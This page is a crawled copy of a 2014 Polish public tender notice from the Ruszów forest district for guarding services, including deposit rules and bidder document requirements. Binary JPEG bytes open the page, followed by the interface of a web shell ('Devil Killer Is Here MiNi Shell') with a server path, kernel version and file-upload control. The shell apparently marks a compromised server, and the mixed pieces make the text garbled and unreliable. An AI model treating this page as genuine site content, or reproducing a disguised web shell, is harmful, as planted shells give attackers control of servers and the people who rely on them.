JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141211/256871-N-2014.html

<p class="kh_header"><b>Ruszów: Usługi ochrony mienia</b><br>
<b>Numer ogłoszenia: 256871 - 2014; data zamieszczenia: 11.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Ruszów , ul. Leśna 2, 59-950 Ruszów, woj. dolnośląskie, tel. 75 7714339, faks 75 7714468.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ruszow.wroclaw.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi ochrony mienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa obejmująca:
W zakresie ochrony mienia:
1. Jednoosobowa ochrona zaplecza magazynowo - warsztatowego położonego w Ruszowie przy                                       ul. Koszarowej 2:
    - w dni robocze od godziny 1600 do godziny 700,
    - w dni wolne od pracy, święta przez 24 godziny na dobę,
      obejmującą: ochronę obiektów, sprzętu, urządzeń oraz terenu przed dostępem osób        nieuprawnionych, poprzez ciągłe monitorowanie terenu, w tym:  przeprowadzanie kontroli        pomieszczeń i otoczenia nie rzadziej niż co 1 godzinę.
 2. Otwieranie i zamykanie bramy wjazdowej na teren objęty ochroną.
3. W przypadku stwierdzenia zagrożeń zaistniałych na terenie objętym ochroną natychmiastowe     zawiadomienie Zamawiającego oraz policji, a w razie potrzeby - straży pożarnej i pogotowia     ratunkowego.
4. Włączanie i wyłączanie oświetlenia terenu objętego ochroną.
5. Ochrona całości mienia Zamawiającego znajdującego się na terenie objętym ochroną przed     kradzieżą, zniszczeniem, uszkodzeniem, pożarem i innymi zdarzeniami losowymi.
6. Postępowanie zgodnie z instrukcją p.poż. i bhp oraz zasadami postępowania w przypadku     zagrożenia bezpieczeństwa życia ludzi.
7. Ochrona obiektów i terenu przed dostępem osób nieuprawnionych.
8. Zapewnienie porządku i spokoju na terenie chronionym.
9. Sporządzanie pisemnego meldunku w Książce zdarzeń stałego dyżuru przed zakończeniem     dyżuru.
10. Wykonawca jest zobowiązany do patrolowania terenu objętego przedmiotem zamówienia.
W zakresie utrzymania porządku na terenie objętym ochroną.
11. Utrzymanie porządku w kotłowni oraz pozostałych pomieszczeniach sąsiadujących, w tym     codzienne wynoszenie pozostałości po spalaniu z kotła centralnego ogrzewania poza     pomieszczenie kotłowni.
12. Przez sprzątanie w/w pomieszczeń należy rozumieć działania mające na celu utrzymanie     ciągłej czystości i porządku.
13. Wykonywanie usługi sprzątania pomieszczeń odbywać się będzie w czasie pełnienia     ochrony.
14. Wykonywanie kompleksowej usługi sprzątania odbywać się będzie przy użyciu środków     czystości oraz niezbędnego sprzętu, do zapewnienia których zobowiązany jest Wykonawca,     przy czym środki chemiczne używane przez Wykonawcę do wykonania przedmiotu     zamówienia muszą być biologicznie neutralne oraz posiadać wymagane przepisami atesty.
15. Wszystkie zastosowane środki czyszczące muszą być przeznaczone do powierzchni,                                             do czyszczenia której będą zastosowane.
Do obowiązków Wykonawcy przedmiotu zamówienia należy również:
16. Palenie w kotle c.o. (100 kW typu Atmos), ogrzewającym pomieszczenia biurowo-    administracyjne opałem  (drewnem)  dostarczanym przez Zamawiającego w okresie określonym     przez  Zamawiającego.
17. Wykonawca zobowiązany jest do utrzymania temperatury w ogrzewanych pomieszczeniach     w wysokości nie mniejszej niż 15oC.
18. Bezpośrednio po pocięciu przywiezionego przez Zamawiającego drewna opałowego     Wykonawca jest zobowiązany do jego uporządkowania, połupania oraz poukładania                            w miejscu wskazanym przez Zamawiającego, w terminie do 7 dni od daty pocięcia.
    Łupaniu podlega całość przywiezionego i pociętego opału.
19. Bezzwłoczne informowanie osób wyznaczonych do kontaktu, ze strony Zamawiającego,                              w przypadku zauważenia sytuacji mogących spowodować szkody w mieniu Zamawiającego.
Wykonawca zobowiązany jest do:
20. Przedłożenia do akceptacji imiennego wykazu osób wykonujących przedmiot zamówienia. 
    Zamawiający wymaga, aby osoby uczestniczące bezpośrednio w wykonywaniu usługi nie      były karane.
21. Zapewnienia odpowiedniej ilość osób do wykonania przedmiotu zamówienia.
22. Zachowania w tajemnicy wszelkich informacji uzyskanych w związku z wykonywaniem     przedmiotu zamówienia.
23. Prowadzenia książki dyżurów, do której osoby sprawujące bezpośrednią ochronę     zobowiązane są do wpisywania wszelkich spostrzeżeń, uwag oraz istotnych wydarzeń     związanych ze sprawowaniem ochrony, a także wykonanych połączeń telefonicznych.
24. Składania do pierwszego dnia roboczego po upływie miesiąca, w którym była wykonywana     usługa (lub na każde żądanie Zamawiającego), książki dyżurów prowadzonej w miesiącu     poprzedzającym.
25. Zgłaszania usterek, awarii oraz wszelkich nieprawidłowości zauważonych podczas     wykonywania usługi.
26. Ścisłej współpracy z pracownikiem Zamawiającego odpowiedzialnym za realizację     przedmiotu zamówienia.
27. Zapewnienia nadzoru i kontroli kierowniczej nad pracownikami wykonującymi przedmiot     zamówienia.
28. Utrzymania czystości i porządku na terenie objętym ochroną.
29. W przypadku stwierdzenia faktu kradzieży z włamaniem - zawiadomienia Zamawiającego.
30. Przeprowadzenia wspólnie z Zamawiającym wstępnego dochodzenia oraz inwentaryzacji     pokradzieżowej.
31. Zapewnienia jednolitego umundurowania pracownikom wykonującym usługę będącą     przedmiotem zamówienia.
32. Świadczenia wszystkich usług będących przedmiotem zamówienia przy zapewnieniu osobom     wykonującym własnej odzieży roboczej, środków, sprzętu, urządzeń oraz innych elementów     niezbędnych do należytego wykonania przedmiotu zamówienia.
33. Zorganizowania stanowisk pracy i przeszkolenia osób zatrudnionych do wykonania przedmiotu     zamówienia zgodnie z obowiązującymi przepisami.
34. Dobrania środków wykorzystywanych przy realizacji przedmiotu zamówienia w taki sposób,                   aby nie uszkodziły mienia Zamawiającego.
35. Używania środków chemicznych i materiałów wykorzystywanych przy realizacji przedmiotu     zamówienia w sposób zgodny z przeznaczeniem i instrukcją producenta.
36. Zagwarantowania w sytuacjach wymagających szybkiej interwencji zarówno w dni robocze,                          jak i wolne, wykonania przedmiotu zamówienia.
37. Codziennego informowania Zamawiającego o wszelkich zauważonych usterkach                                      i uszkodzeniach w miejscu wykonywania przedmiotu zamówienia.
38. Odsunięcia, na żądanie Zamawiającego, od wykonywania przedmiotu zamówienia osób, które     według Zamawiającego nie wykonują należycie przedmiotu zamówienia.
39. Zachowania w tajemnicy wszelkich informacji dotyczących działalności Zamawiającego,     obejmujących między innymi: systemu zabezpieczeń, przedmiotów i urządzeń znajdujących się     w pomieszczeniach Zamawiającego oraz pozostawienia w stanie nienaruszonym wszelkich     materiałów, z którymi mógł się zetknąć w trakcie realizacji przedmiotu zamówienia.
40. Złożenia, przed rozpoczęciem wykonywania przedmiotu zamówienia, przez osoby, które będą     wykonywać przedmiot zamówienia, oświadczenia o zachowaniu tajemnicy. Wykonawca jest     zobowiązany do dostarczenia tego oświadczenia przed rozpoczęciem realizacji przedmiotu     zamówienia. Obowiązek zachowania tajemnicy spoczywa na Wykonawcy oraz osobach     wykonujących przedmiot zamówienia bezterminowo.
41. Ponoszenia wobec Zamawiającego odpowiedzialności cywilnej za wszelkie szkody osobiste                  i majątkowe wynikłe z niewykonania lub nienależytego wykonania przedmiotu zamówienia.
42. Pokrycia roszczeń w przypadku wystąpienia przez osoby trzecie z roszczeniami wobec     Zamawiającego związanymi z niewykonaniem lub nienależytym wykonaniem przedmiotu     zamówienia.
43. Ponoszenia odpowiedzialności za skutki działań osób wykonujących w imieniu Wykonawcy      usługi będące przedmiotem zamówienia.
44. Ponoszenia odpowiedzialności za szkody wynikłe w wyniku niewłaściwego realizowania     przedmiotu zamówienia.
Zamawiający udostępni Wykonawcy pomieszczenie socjalne w miejscu wykonywania usługi oraz możliwość korzystania z linii telefonicznej w celach związanych z wykonywaniem przedmiotu zamówienia.
Wykonawca jest zobowiązany do utrzymania czystości i porządku w udostępnionym przez Zamawiającego pomieszczeniu socjalnym oraz terenu wokół niego.
Zamawiający zastrzega sobie prawo do ciągłego nadzoru nad prawidłowością wykonywania usługi będącej przedmiotem zamówienia.
Wykonawca zobowiązany jest do używania własnych urządzeń i sprzętu wykorzystywanych                     do prawidłowego wykonania przedmiotu zamówienia.
Wszystkie środki zastosowane przez Wykonawcę oraz przeznaczone do użytku Zamawiającego podlegają wcześniejszemu uzgodnieniu i akceptacji przez Zamawiającego.
Osoby wykonujące przedmiot zamówienia powinny posiadać aktualne przeszkolenie w zakresie bhp oraz ochrony p.poż.
Zabrania się osobom wykonujący przedmiot zamówienia wprowadzania na teren objęty ochroną osób postronnych oraz członków rodziny.
Wykonawca i osoby wyznaczone do realizacji przedmiotu zamówienia zobowiązane są                                   do zachowania w tajemnicy wszelkich informacji uzyskanych w związku z wykonywaniem usługi sprzątania.
Wszystkie prace dodatkowe wykonywane będą w okresie pełnienia usługi ochrony mienia.
Orientacyjna ilość godzin usługi ochrony mienia - do 7000 godzin..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.34.11.40-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości 1200,00 złotych (słownie: jeden tysiąc
    dwieście złotych).
2. Wadium musi zostać wniesione przed upływem terminu składania ofert.
3. Wadium może być wniesione w jednej lub kilku następujących formach:
    1) pieniądzu;
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, 
        z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
    3) gwarancjach bankowych;
    4) gwarancjach ubezpieczeniowych;
    5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy
        dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
        z 2007 r. Nr 42 poz. 275 ze zmianami).
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
    Zamawiającego: PKO BP S.A. Bolesławiec  Nr  51 1020 2137 0000 9202 0101 5841  
    z dopiskiem: Wadium - 44/2710/14 - Ochrona
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
6. Wadium wniesione w formie: poręczenia bankowego lub poręczenia spółdzielczej kasy
    oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej oraz w formie
    poręczenia udzielonego przez podmioty, o których mowa w pkt. 3.5, należy złożyć w formie 
    oryginału w siedzibie Zamawiającego (sekretariat - pokój nr 20), a kopię załączyć do oferty.
7. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty
    najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta
    została wybrana jako najkorzystniejsza.
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci
    wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu
    zabezpieczenia należytego wykonania umowy.
9. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę
    przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono
    wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako
    najkorzystniejsza. Wykonawca zobowiązany jest do wniesienia wadium w terminie określonym
    przez  Zamawiającego.
11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami 
    wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
    pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej  za przelew
    pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
12. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została
     wybrana:
     1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych
        w ofercie;
     2) nie wniósł wymaganego zabezpieczenia należytego wykonania przedmiotu umowy;
     3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących
         po stronie Wykonawcy.
13. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, który w określonym
    terminie nie złożył wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których
    mowa w pkt. XI SIWZ lub pełnomocnictw, i w odpowiedzi na wezwanie Zamawiającego nie
    złoży ich w wyznaczonym terminie, chyba że udowodni, że wynika to z przyczyn nie leżących
    po jego stronie.
14. W przypadku wniesienia wadium w walucie innej niż PLN, przeliczenie wartości wadium  
    na PLN nastąpi  wg średniego kursu NBP z dnia publikacji ogłoszenia.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał koncesję na prowadzenie działalności                           w zakresie ochrony mienia;
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca potwierdził wykonanie lub wykonywanie w okresie     ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia     działalności jest krótszy - w tym okresie trzech usług ochrony mienia o wartości nie mniejszej 
    niż 60 000,00 zł netto każda (słownie: sześćdziesiąt tysięcy złotych);
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, do spełnienia których     zobligowany jest Wykonawca, poza złożeniem Oświadczenia o spełnieniu warunków udziału 
    w postępowaniu (Załącznik Nr 2 do SIWZ). 
    Złożone oświadczenie jest potwierdzeniem przez Wykonawcę posiadania lub dysponowania 
    m. in. odpowiednim potencjałem technicznym umożliwiającym prawidłową     realizację przedmiotu zamówienia.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, do spełnienia których     zobligowany jest Wykonawca, poza złożeniem Oświadczenia o spełnieniu warunków udziału 
    w postępowaniu (Załącznik Nr 2 do SIWZ). 
    Złożone oświadczenie jest potwierdzeniem przez Wykonawcę posiadania lub dysponowania 
    m. in. odpowiednim potencjałem technicznym umożliwiającym prawidłową     realizację przedmiotu zamówienia.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedłożenia opłaconej polisy, a w przypadku jej braku innego dokumentu     potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie     prowadzonej działalności związanej z przedmiotem zamówienia o minimalnej wartości wynoszącej    60 000,00 zł (słownie: sześćdziesiąt tysięcy złotych);
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

